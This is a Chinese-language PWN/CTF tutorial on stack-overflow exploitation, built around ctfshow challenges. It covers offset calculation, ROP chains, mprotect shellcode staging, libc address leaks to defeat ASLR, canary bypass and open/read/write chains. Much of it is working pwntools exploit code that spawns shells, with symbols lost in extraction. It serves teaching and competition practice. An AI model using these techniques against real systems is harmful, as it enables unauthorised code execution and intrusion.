1. 栈溢出基础从零开始理解漏洞利用栈溢出是PWN领域最经典的漏洞类型之一也是CTF比赛中出现频率最高的题型。我们先从一个最简单的例子开始看看如何利用栈溢出漏洞控制程序执行流程。1.1 栈的结构与函数调用当程序调用函数时会在栈上分配空间用于存储局部变量、保存返回地址等。典型的32位程序栈帧结构如下高地址 ----------------- | 参数n | | ... | | 参数1 | ----------------- | 返回地址 | -- EIP将跳转到这里 ----------------- | 保存的EBP | -- 当前EBP指向这里 ----------------- | 局部变量 | | ... | 低地址在x86架构中栈是从高地址向低地址增长的。当函数返回时会从栈上弹出返回地址并跳转到该地址继续执行。1.2 最简单的栈溢出利用让我们看一个ctfshow上的实际例子(pwn_035)void vulnerable_function() { char buf[100]; gets(buf); // 危险函数不检查输入长度 }使用checksec检查程序保护机制checksec --filepwn_035输出显示这是一个32位程序只开启了NX保护栈不可执行。这意味着我们不能直接在栈上执行shellcode但可以通过覆盖返回地址来控制程序流程。1.3 计算溢出偏移量要成功利用栈溢出我们需要精确计算从缓冲区开始到返回地址的偏移量。常用方法有使用cyclic模式字符串通过调试器观察静态分析IDA反汇编代码以pwn_035为例通过IDA可以看到buf相对于EBP的偏移是0x6c加上4字节的保存EBP所以返回地址的偏移是0x6c 0x04 0x70。1.4 构造利用payload假设程序中有一个后门函数backdoor()地址是0x08048586我们可以构造如下payloadfrom pwn import * payload bA * 0x70 # 填充缓冲区 payload p32(0x08048586) # 覆盖返回地址这样当函数返回时就会跳转到后门函数执行。2. 进阶技巧ROP链的构造与应用当程序中没有现成的后门函数时我们需要使用更高级的技术——ROP(Return-Oriented Programming)。2.1 ROP基本原理ROP利用程序中已有的代码片段(gadget)通过精心构造的栈布局将这些片段串联起来实现任意代码执行。每个gadget以ret指令结束程序控制流就像在返回导向的编程。2.2 寻找和组合gadget常用的gadget类型包括pop reg; ret用于设置寄存器值mov [reg], reg; ret用于内存写入add/sub reg, reg; ret用于算术运算使用工具查找gadgetROPgadget --binary pwn_0362.3 实际案例pwn_036分析这是一个没有后门函数的32位程序但提供了system()和/bin/sh字符串。我们需要控制EIP跳转到system()设置栈帧使system()的参数是/bin/sh的地址构造ROP链from pwn import * system_plt 0x080483A0 binsh_addr 0x08048750 offset 0x6c 0x04 payload bA * offset payload p32(system_plt) payload p32(0xdeadbeef) # 伪造的返回地址 payload p32(binsh_addr) # system的参数2.4 64位程序的ROP特点64位程序与32位的主要区别在于参数传递方式前六个参数通过寄存器传递(RDI, RSI, RDX, RCX, R8, R9)需要找到pop rdi; ret这样的gadget来设置参数例如pwn_038的利用pop_rdi 0x4007e3 system_plt 0x400520 binsh 0x400808 payload bA * (0x20 8) payload p64(pop_rdi) payload p64(binsh) payload p64(system_plt)3. 绕过保护机制实战技巧现代程序通常会启用各种保护机制我们需要掌握相应的绕过技巧。3.1 绕过NX(栈不可执行)当栈不可执行时我们有几种选择使用ROP技术使用mprotect()将栈改为可执行使用已有的可执行内存区域pwn_049展示了如何使用mprotectmprotect_plt 0x0806CDD0 read_plt 0x0806BEE0 bss 0x080DB000 payload bA * offset payload p32(mprotect_plt) payload p32(pop3_ret) payload p32(bss) # 地址 payload p32(0x1000) # 大小 payload p32(0x7) # PROT_READ|PROT_WRITE|PROT_EXEC payload p32(read_plt) payload p32(pop3_ret) payload p32(0) # stdin payload p32(bss) # buf payload p32(0x100) # size payload p32(bss) # 跳转到shellcode3.2 处理ASLR(地址随机化)当程序启用ASLR时我们需要先泄漏某个函数的真实地址然后计算libc基址# 泄漏puts地址 payload bA * offset payload p32(puts_plt) payload p32(main_addr) # 返回到main函数再次利用 payload p32(puts_got) # 接收泄漏的地址 puts_addr u32(p.recv(4)) libc_base puts_addr - libc.sym[puts] system_addr libc_base libc.sym[system]3.3 绕过Stack CanaryStack Canary是防止栈溢出的保护机制常见绕过方法包括泄漏canary值覆盖__stack_chk_fail的GOT表不触发canary检查如只覆盖局部变量4. 高级技巧特殊场景下的漏洞利用4.1 格式化字符串漏洞结合利用有些题目会同时存在栈溢出和格式化字符串漏洞可以组合利用# 先用格式化字符串泄漏栈地址 payload b%p. * 20 p.sendline(payload) leak p.recv().split(b.) stack_addr int(leak[5], 16) # 然后用栈溢出构造ROP链 payload bA * offset payload p32(system_addr) payload p32(0) payload p32(stack_addr offset_to_binsh)4.2 堆栈结合利用当栈空间不足时可以考虑将ROP链或shellcode放在堆上# 在堆上布置ROP链 heap_addr 0x0804B000 payload p32(system_addr) p32(0) p32(binsh_addr) # 通过栈溢出跳转到堆 rop_chain [ pop_eax, heap_addr, jmp_eax ]4.3 利用文件操作获取flag有些题目不提供shell而是直接读取flag文件。这时可以构造ROP链调用open/read/write# 32位示例 rop_chain [ pop3_ret, 0x804b000, # buf 0x100, # size 0, # fd (stdin) read_plt, pop3_ret, 0x804b000, # filename 0, # flags 0, # mode open_plt, pop3_ret, 3, # fd 0x804b100, # buf 0x100, # count read_plt, pop3_ret, 1, # fd (stdout) 0x804b100, # buf 0x100, # count write_plt ]5. 实用工具与调试技巧5.1 常用工具介绍pwntoolsPython库提供了开发exploit所需的各种功能ROPgadget查找二进制文件中的gadgetchecksec检查二进制文件的保护机制GDB with peda/gef/pwndbg强大的调试工具one_gadget查找libc中的execve(/bin/sh) gadget5.2 GDB调试技巧调试栈溢出时常用的GDB命令# 设置断点 b *vulnerable_function20 # 查看栈内容 x/40wx $esp # 查看寄存器 info registers # 查看内存映射 vmmap # 跟踪执行 ni (next instruction) si (step into)5.3 pwntools实用技巧# 自动计算偏移 io process(./pwn) elf ELF(./pwn) rop ROP(elf) # 自动构建ROP链 rop.call(system, [next(elf.search(b/bin/sh))]) payload flat({offset: rop.chain()}) # 自动化泄漏 def leak_addr(addr): payload fmtstr_payload(offset, {addr: %s}, write_sizebyte) io.sendline(payload) return u64(io.recv(8))6. ctfshow题目实战分析6.1 pwn_045无system和/bin/sh的32位程序这道题既没有提供system函数也没有/bin/sh字符串。我们需要使用write泄漏libc地址计算libc基址获取system和/bin/sh地址构造ROP链from pwn import * context(archi386, oslinux) io process(./pwn_045) elf ELF(./pwn_045) libc ELF(/lib/i386-linux-gnu/libc.so.6) # 第一次溢出泄漏libc地址 rop1 ROP(elf) rop1.write(1, elf.got[write], 4) rop1.call(elf.sym[main]) payload1 bA*(0x6c4) rop1.chain() io.sendline(payload1) write_addr u32(io.recv(4)) libc.address write_addr - libc.sym[write] # 第二次溢出获取shell rop2 ROP([elf, libc]) rop2.system(next(libc.search(b/bin/sh))) payload2 bA*(0x6c4) rop2.chain() io.sendline(payload2) io.interactive()6.2 pwn_05064位程序与栈对齐问题64位程序中有时需要考虑栈对齐问题。当system崩溃时可以尝试添加ret gadget进行对齐# 找到ret gadget ret 0x4004fe rop ROP(elf) rop.raw(ret) # 栈对齐 rop.call(libc.sym[system], [bin_sh_addr])6.3 pwn_051非常规溢出点这道题通过字符串处理函数实现溢出关键点是输入特定字符会被替换为更长字符串利用这种扩展实现溢出# I会被替换为IronMan从而扩展输入长度 payload bI*16 # 实际会扩展为更长的字符串 payload p32(backdoor_addr)7. 从CTF到实战思维训练CTF题目往往简化了真实场景但培养的思维方式是通用的信息收集检查保护机制、分析二进制结构、寻找敏感函数漏洞定位识别危险函数、分析输入点、确定溢出长度利用开发根据保护机制选择合适的利用技术稳定利用考虑各种边界情况确保exploit稳定可靠在实际漏洞利用中还需要考虑不同环境下的地址差异漏洞触发条件的稳定性利用失败后的恢复机制多阶段利用的可靠性8. 持续学习建议要成为PWN高手建议系统学习计算机体系结构特别是栈、堆的内存布局深入理解调用约定和ABI规范熟悉常见保护机制的原理和绕过方法定期参加CTF比赛积累经验研究真实世界的漏洞利用案例参与开源安全项目如kernel exploit开发一些推荐的学习资源《漏洞利用开发实战》《CTF竞赛权威指南》LiveOverflow的YouTube频道ROP Emporium挑战系列